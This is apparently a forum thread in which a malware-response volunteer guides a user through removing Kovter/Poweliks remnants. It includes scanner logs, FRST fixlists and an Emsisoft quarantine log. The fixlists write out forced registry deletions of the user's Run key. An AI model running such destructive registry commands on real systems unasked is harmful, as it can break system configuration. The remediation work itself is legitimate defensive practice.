[2016.10.18 21:01:31.281] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0053-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.281] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0053-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.281] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0054-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.281] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0054-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.281] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0054-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.281] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0055-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.282] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0055-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.282] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0055-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.282] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0056-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.282] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0056-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.282] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0056-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.282] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0057-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.282] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0057-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.282] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0057-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.282] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0058-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.282] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0058-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.282] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0058-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.282] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0059-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.282] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0059-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.282] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0059-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.283] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0060-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.283] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0060-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.283] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0060-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.283] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0061-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.283] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0061-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.283] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0061-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.283] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0062-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.283] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0062-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.283] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0062-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.283] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0063-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.283] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0063-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.283] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0063-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.283] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0064-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.283] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0064-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.283] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0064-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.283] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0065-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.284] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0065-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.284] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0065-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.284] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0066-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.284] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0066-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.284] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0066-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.284] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0067-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.284] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0067-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.284] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0067-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.284] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0068-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.284] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0068-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.284] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0068-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.284] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0069-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.284] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0069-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.284] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0069-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.284] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0070-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.284] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0070-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.285] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0070-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.285] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0071-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.285] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0071-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.285] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0071-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.285] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0072-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.285] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0072-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.285] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0072-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.285] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0073-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.285] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0073-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.285] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0073-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.285] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0074-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.285] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0074-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.285] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0074-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.285] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0075-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.286] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0075-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.286] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0075-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.286] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0076-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.286] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0076-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.286] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0076-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.286] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-FFFF-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.286] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{E19F9331-3110-11D4-991C-005004D3B3DB}]
[2016.10.18 21:01:31.286] - INFO: Processing [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2016.10.18 21:01:31.286] - INFO: Processing value [] = [%systemroot%\sysWOW64\wbem\wmiprvse.exe]
[2016.10.18 21:01:31.286] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2016.10.18 21:01:31.287] - INFO: Processing invalid values in [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2016.10.18 21:01:31.287] - INFO: Processing value [] = [%systemroot%\sysWOW64\wbem\wmiprvse.exe]
[2016.10.18 21:01:31.287] - INFO: Processing value [ServerExecutable] = [%systemroot%\sysWOW64\wbem\wmiprvse.exe]
[2016.10.18 21:01:31.287] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2016.10.18 21:01:31.287] - INFO: Processing value [ServerExecutable] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2016.10.18 21:01:31.287] - INFO: Processing invalid subkeys in [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2016.10.18 21:01:31.287] - INFO: Processing [HKLM\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}]...
[2016.10.18 21:01:31.287] - INFO: Processing subkey [\Registry\Machine\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32]
[2016.10.18 21:01:31.287] - INFO: Processing subkey [\Registry\Machine\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32]
[2016.10.18 21:01:31.287] - INFO: (XSW) Scanning for XSW variant...
[2016.10.18 21:01:31.378] - INFO: (XSW) Processing users subkeys...
[2016.10.18 21:01:31.382] - INFO: Win32/Poweliks not found
[2016.10.18 21:01:43.293] - End
 

 

I uploaded the Upload.zip file using the link provided.

 

After running FRST, ESET and restarting, Viruscan on access scanner still detects two Powelike!lnk and one Powelike!bat

 

i appreciate your help on this.  Thank you!



#4 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:25 AM

Posted 19 October 2016 - 07:04 AM

FRST failed to delete the Poweliks-related Run entries, so we'll go at it another way. Follow the instructions below please.

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Right-click on your Desktop, select New and click on Text Document. Name it fixlist (make sure it's a .txt file) and press on Enter;
  • Open the file you just created and copy/paste the content below in it, then save it (Ctrl + S);
    CMD: reg export "HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run" "%userprofile%\Desktop\Export.txt"
    
  • Right-click on the FRST executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
    NYA5Cbr.png
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste its content in your next reply;
  • A file called Export.txt will be located on your desktop. Open it, and copy/paste its content in your next reply as well;

Edited by Aura, 19 October 2016 - 11:50 AM.

animinionsmalltext.gif
unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#5 pmate888

pmate888
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:03:25 AM

Posted 20 October 2016 - 12:21 AM

Hi Aura

thank you for your promt reply.  I ran FRST fix as instructed and the contents of the Fixlog.txt file are:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by Wayne (19-10-2016 19:13:12) Run:3
Running from C:\Users\Wayne\Desktop
Loaded Profiles: Wayne (Available Profiles: Wayne)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CMD: reg export "HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run" "%userprofile%\Desktop\Export.txt"
*****************


========= reg export "HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run" "%userprofile%\Desktop\Export.txt" =========

The operation completed successfully.


========= End of CMD: =========


==== End of Fixlog 19:13:13 ====

 

 

The contents of the Export.txt file are:

 

Windows Registry Editor Version 5.00

[HKEY_USERS\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run]
"swg"="\"C:\\Program Files (x86)\\Google\\GoogleToolbarNotifier\\GoogleToolbarNotifier.exe\""
 

 

After running the FRST fix, the Viruscan On-Access scan still detects Powelike!lnk and Powelike!bat.

 

appreciate your help, thank you!



#6 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:25 AM

Posted 20 October 2016 - 06:53 AM

I call it a FRST fix because that's what it is, though it doesn't mean that it'll fix anything. In that case, I simply used it to export a Registry key :) Now we'll be running a "real" FRST fix to try to get rid of Kovter (because this is Kovter, not Poweliks, thanks to Toffee for the heads-up).

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Right-click on your Desktop, select New and click on Text Document. Name it fixlist (make sure it's a .txt file) and press on Enter;
  • Open the file you just created and copy/paste the content below in it, then save it (Ctrl + S);
    CloseProcesses:
    
    REG: REG DELETE "HKEY_USERS\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run" /f
    DeleteKey: HKEY_USERS\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run
    
  • Right-click on the FRST executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
    NYA5Cbr.png
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste its content in your next reply;
  • Restart your computer;
Once done, download the attached Script.reg and double-click on it. It'll asks you if you want to merge the changes in your Registry. Accept, and let me know if you get an error or success message after that.

Do you still get warnings about Poweliks.lnk and Poweliks!bat after that?

Attached Files


animinionsmalltext.gif
unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#7 pmate888

pmate888
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:03:25 AM

Posted 21 October 2016 - 02:31 AM

Hi Aura

 

Thankyou for your reply.  I ran FRST fix and it created Fixlog.txt file as you said.  The contents of the file are:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by Wayne (20-10-2016 20:52:43) Run:4
Running from C:\Users\Wayne\Desktop
Loaded Profiles: Wayne (Available Profiles: Wayne)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:

REG: REG DELETE "HKEY_USERS\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run" /f
DeleteKey: HKEY_USERS\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run
*****************

Processes closed successfully.

========= REG DELETE "HKEY_USERS\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run" /f =========

The operation completed successfully.



========= End of Reg: =========

HKEY_USERS\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Windows\CurrentVersion\Run => key not found.


The system needed a reboot.

==== End of Fixlog 20:52:47 ====

 

 

After reboot, Viruscan on-access scanner did not detect Powelike!lnk or Powelike!bat.

 

I downloaded and double clicked on Script.reg as instructed and allowed it to make changes to registry.

 

An error message appeared and it said:  "Cannot input C:\users\Wayne\Desktop\Script.reg: The specified file is not a registry script. You can only input binary registry files from within the registry editor."

 

After running Script.reg and getting the error message, Viruscan on-access scan has still not detected Powelike!lnk or Powelike!bat or anything else.  Awesome!!  Seems to be fixed - is there anything else i need to do?

 

thank you so much for your help!



#8 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:25 AM

Posted 21 October 2016 - 07:12 AM

Sorry I forgot to add the word "Version" to the script. Try this one, it should work. And we'll run Emsisoft Emergency Kit to check for remnants and grab a fresh pair of FRST logs too.

G0tu5D9.pngEmsisoft Emergency Kit
Follow the instructions below to run a scan using the Emsisoft Emergency Kit.
  • Download the Emsisoft Emergency Kit and execute it. From there, click on the Extract button to extract the program in the EEK folder;
  • Once the extraction is complete, Emsisoft Emergency Kit will open, and suggest you to run an online update before using the program. Click on Yes to launch it.
  • After the update, click on Malware Scan under 2. Scan and accept to let Emsisoft Emergency Kit detect PUPs (click on Yes).
  • Once the scan is complete, make sure that every item in the list is checked, and click on Quarantine selected;
    Egla2gt.png
  • If it asks you for a reboot to delete some items, click on Ok to reboot automatically;
  • After the restart, click on the Start Emsisoft Emergency Kit icon again on your desktop to open it;
  • This time, click on Logs;
  • From there, go under the Quarantine Log tab, and click on the Export button;
    IgfWDr3.png
  • Save the log on your desktop, then open it, and copy/paste its content in your next reply;
iO3R662.pngFarbar Recovery Scan Tool (FRST) - Scan mode
Follow the instructions below to download and execute a scan on your system with FRST, and provide the logs in your next reply.
  • Right-click on the executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds;
  • Click on the Scan button;
  • On completion, two message box will open, saying that the results were saved to FRST.txt and Addition.txt, then open two Notepad files;
  • Copy and paste the content of both FRST.txt and Addition.txt in your next reply;
How's your computer running now?

Your next reply(ies) should include:
  • Confirmation that the Script.reg merged successfully in your Registry;
  • Copy/pasted content of EEK's clean log;
  • Copy/pasted content of FRST.txt;
  • Copy/pasted content of Addition.txt;
  • Answer to my question about your computer's current state;

Attached Files


animinionsmalltext.gif
unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#9 pmate888

pmate888
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:03:25 AM

Posted 22 October 2016 - 04:10 AM

hi Aura

 

i downloaded and ran Script.reg as instructed and it displayed the following message:  "The keys and values contained in C:\Users\Wayne\Desktop\Script.reg have been successfully added to the registry."

 

i ran EEK malware scan as instructed and exported the quaratine log.  the contents of the Quarantine_161021-215939.txt file is:

 

Emsisoft Emergency Kit - Version 11.9
Quarantine log

Date    Source    Event    Detection    
10/21/2016 9:57:28 PM    C:\ProgramData\partner    Moved to quarantine    Application.AppInstall (A)    
10/21/2016 9:57:28 PM    Value: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM -> DISABLETASKMGR    Moved to quarantine    Setting.DisableTaskMgr (A)    
10/21/2016 9:57:28 PM    Value: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM -> DISABLEREGISTRYTOOLS    Moved to quarantine    Setting.DisableRegistryTools (A)    
10/21/2016 9:57:28 PM    Value: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER -> NORUN    Moved to quarantine    Setting.NoRun (A)    
10/21/2016 9:57:28 PM    Value: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER -> NOFOLDEROPTIONS    Moved to quarantine    Setting.NoFolderOptions (A)    
10/21/2016 9:57:28 PM    Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\PROTECTOR_DLL.PROTECTORBHO    Moved to quarantine    Application.AdReg (A)    
10/21/2016 9:57:27 PM    Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\PROTECTOR_DLL.PROTECTORBHO.1    Moved to quarantine    Application.AdReg (A)    
 

 

i ran FRST scan as instructed and it generated the FRST.txt and Addition.txt files.  The contents of the FRST.txt file is:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 17-10-2016
Ran by Wayne (administrator) on WWX220 (21-10-2016 22:02:51)
Running from C:\Users\Wayne\Desktop
Loaded Profiles: Wayne (Available Profiles: Wayne)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Lenovo.) C:\Windows\System32\ibmpmsvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tphkload.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcPrfMgrSvc.exe
